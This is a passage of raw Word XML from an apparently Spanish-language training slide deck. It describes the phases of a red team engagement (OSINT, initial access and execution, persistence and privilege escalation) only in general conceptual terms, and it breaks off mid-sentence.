        <w:t xml:space="preserve"> descripción general de alto nivel del ciclo de vida del ataque del Equipo Rojo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B30E1" w14:textId="659A01CE" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2135"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725EE600" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1343"/>
        </w:tabs>
        <w:spacing w:before="256"/>
        <w:ind w:left="1343" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Este ciclo indica las fases de principio a fin de un compromiso de Red Team en un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA8C08" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId17"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="840" w:left="0" w:header="0" w:footer="658" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CAD676"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4272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B82C785" wp14:editId="232D14CE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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35" name="Graphic 35"/>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36" name="Textbox 36"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59E3A7E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="271"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Amplio OSINT</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3B82C785" id="Group 34" o:spid="_x0000_s1046" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15734272;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">
                <v:shape id="Graphic 35" o:spid="_x0000_s1047"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 36" o:spid="_x0000_s1048"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9E3A7E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="271"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Amplio OSINT</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92589D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5E6084" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA98DDC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="117"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B3E598" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="953" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Esta fase generalmente se ocupa de recopilar más y más información sobre la organización objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BECA9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E32CD35" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="467"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF764D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="1903" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los sitios de redes sociales, las plataformas donde los empleados generalmente están activos son el enfoque principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E445E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E597DEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="409"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4138AD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1418" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes con acceso a toneladas de información disponible en Internet intentan averiguar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328329E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1419"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>los sensibles que pueden ser utilizados para fines de explotación posterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AB535" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId18"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="560" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:pgNumType w:start="12"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19769BFB"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4784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1383F45C" wp14:editId="484238E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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38" name="Graphic 38"/>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39" name="Textbox 39"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="401F2314" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="271"/>
                                <w:ind w:left="8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Acceso inicial y ejecución</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1383F45C" id="Group 37" o:spid="_x0000_s1049" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15734784;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">
                <v:shape id="Graphic 38" o:spid="_x0000_s1050"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 39" o:spid="_x0000_s1051"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01F2314" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="271"/>
                          <w:ind w:left="8"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Acceso inicial y ejecución</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AAB0C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2990D469" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34318D19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="117"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFEC076" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="1320" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El acceso inicial consiste en el uso de varios vectores de entrada para obtener acceso dentro de la red interna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A5A8A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE03AB9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="784" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hay formas como la explotación de servicios remotos externos, configuraciones incorrectas en aplicaciones web, etc., que pueden conducir a la puerta de entrada a la red interna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3995D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="339"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B36094A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="1531" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hay muchas formas de obtener acceso inicial, sin embargo, depende de las tecnologías utilizadas por la organización, que se podrían identificar en la sección anterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F077E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="337"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629F3BAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="1149" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La ejecución es código controlado por el atacante que se ejecuta en el equipo de destino. Por ejemplo: Un adversario podría usar una herramienta de acceso remoto para ejecutar el símbolo del sistema que realiza la detección de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C11997" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FF831B"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5296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F8CBFD8" wp14:editId="45A88C79">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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41" name="Graphic 41"/>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42" name="Textbox 42"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3DB97D51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="297"/>
                                <w:ind w:left="1269" w:right="832"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Persistencia y escalada de privilegios</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="2F8CBFD8" id="Group 40" o:spid="_x0000_s1052" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15735296;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">
                <v:shape id="Graphic 41" o:spid="_x0000_s1053"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 42" o:spid="_x0000_s1054"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DB97D51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="297"/>
                          <w:ind w:left="1269" w:right="832"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Persistencia y escalada de privilegios</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="60558710" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2B4C00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="438"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340F7803" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:spacing w:line="524" w:lineRule="exact"/>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes siempre buscan técnicas ocultas para mantener el acceso a los sistemas a través de los reinicios,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507BE707" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="524" w:lineRule="exact"/>
        <w:ind w:left="1149"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">credenciales modificadas, etc., lo que podría cortar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>acceso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
